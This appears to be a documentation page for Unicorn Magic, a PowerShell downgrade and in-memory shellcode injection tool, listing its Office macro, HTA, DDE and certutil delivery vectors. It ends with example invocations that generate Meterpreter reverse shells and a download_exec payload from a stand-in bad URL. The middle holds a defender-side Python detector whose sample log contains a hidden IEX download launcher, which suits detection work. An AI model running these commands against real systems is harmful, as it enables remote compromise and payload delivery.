Unicorn Magic
Unicorn Magic is a tool for performing PowerShell downgrade attacks and injecting shellcode directly into memory. It generates PowerShell commands for payloads like Meterpreter or download/exec, usable in various attack vectors including macros, HTA, and DDE.
Description
Unicorn Magic provides a simple method to execute PowerShell downgrade attacks based on techniques by Matthew Graeber, David Kennedy, and Josh Kelly. It generates ready-to-use PowerShell code for injecting shellcode into memory, supporting Metasploit payloads and windows/download_exec. Output files include powershell_attack.txt with the injection code and unicorn.rc for Metasploit listeners. Use cases include remote command injection via Excel/Word docs, psexec, SQLi, or other delivery systems.
The tool supports multiple attack vectors: Office macros (Auto_Open or AutoOpen), HTA files (index.html and Launcher.hta), certutil for binary transfer via base64, custom PS1 encoding, DDE Office COM for macro-less execution, and Cobalt Strike beacon import. For macros, enable Developer tab in Office; for HTA, users must allow content; DDE requires hosting a download.ps1 file. Custom shellcode and SettingContent-ms generation are also available.
It requires Metasploit for certain payloads and works on native x86 Windows platforms. Generated code often bypasses restrictions using techniques like IEX for downloads and command masking.
How It Works
Unicorn Magic leverages PowerShell downgrade attacks to bypass execution policies and inject shellcode into memory without dropping files. It parses Metasploit payloads or custom shellcode (hex format like 0x00 or raw), encodes them into PowerShell scripts using techniques from Graeber's attacks. For vectors like macro/HTA/DDE, it formats code for VBA, HTML applications, or Office field formulas. Listeners are set via unicorn.rc in msfconsole. Download_exec fetches and runs remote payloads; certutil converts base64 binaries; DDE uses COM objects like DDEInitialize/DDEExecute for RCE.
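An added defender-side example, not part of the Unicorn Magic project: a Python scorer that flags process-creation command lines carrying the traits this section describes (a forced v2 engine, hidden window, IEX-driven download, encoded or masked command). The indicator weights, the alert threshold and the sample log records are constructed assumptions, not tool output.

```python
import re

# Indicators of a PowerShell downgrade / in-memory injection launcher.
# Each entry: (name, regex, weight). Weights are an assumed scoring scheme.
INDICATORS = [
    ("downgrade_v2", re.compile(r"(?i)-v(?:ersion)?\s+2\b"), 3),      # forced v2 engine
    ("hidden_window", re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"), 2),
    ("no_profile", re.compile(r"(?i)-nop(?:rofile)?\b"), 1),
    ("encoded_cmd", re.compile(r"(?i)-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}"), 2),
    ("iex_download", re.compile(r"(?i)\biex\b.*(?:downloadstring|downloadfile|net\.webclient)"), 3),
    ("base64_decode", re.compile(r"(?i)frombase64string"), 1),
]
ALERT_THRESHOLD = 4  # assumed: anything at or above this is worth triage


def score_command_line(cmd):
    """Return (score, [matched indicator names]) for one process command line."""
    if not re.search(r"(?i)powershell", cmd):
        return 0, []
    hits = [name for name, rx, _ in INDICATORS if rx.search(cmd)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    return score, hits


def triage(log_lines):
    """Return [(line, score, hits)] for every line that meets ALERT_THRESHOLD."""
    out = []
    for line in log_lines:
        score, hits = score_command_line(line)
        if score >= ALERT_THRESHOLD:
            out.append((line, score, hits))
    return out


# Constructed sample process-creation records (not real telemetry).
SAMPLE_LOG = [
    "powershell.exe -version 2 -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')\"",
    "powershell.exe -NoProfile -Command Get-ChildItem C:\\Users",
    "powershell.exe -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAKQA=",
    "cmd.exe /c dir",
]

if __name__ == "__main__":
    for line, score, hits in triage(SAMPLE_LOG):
        print(f"[{score}] {', '.join(hits)} :: {line[:60]}")
```

The same regexes map directly onto Sysmon Event ID 1 or Windows 4688 command-line fields; the v2 indicator is the one most worth keeping even if the others are tuned down, since a modern host has little legitimate reason to request the old engine.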
Installation
sudo apt install unicorn-magic
Flags
Examples
python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443
python unicorn.py windows/download_exec url=http://badurl.com/payload.exe
python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 macro
python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 hta
python unicorn.py windows/meterpreter/reverse_https 192.168.5.5 443 dde
python unicorn.py <path_to_payload/exe_encode> crt
python unicorn.py harmless.ps1
python unicorn.py <cobalt_strike_file.cs> cs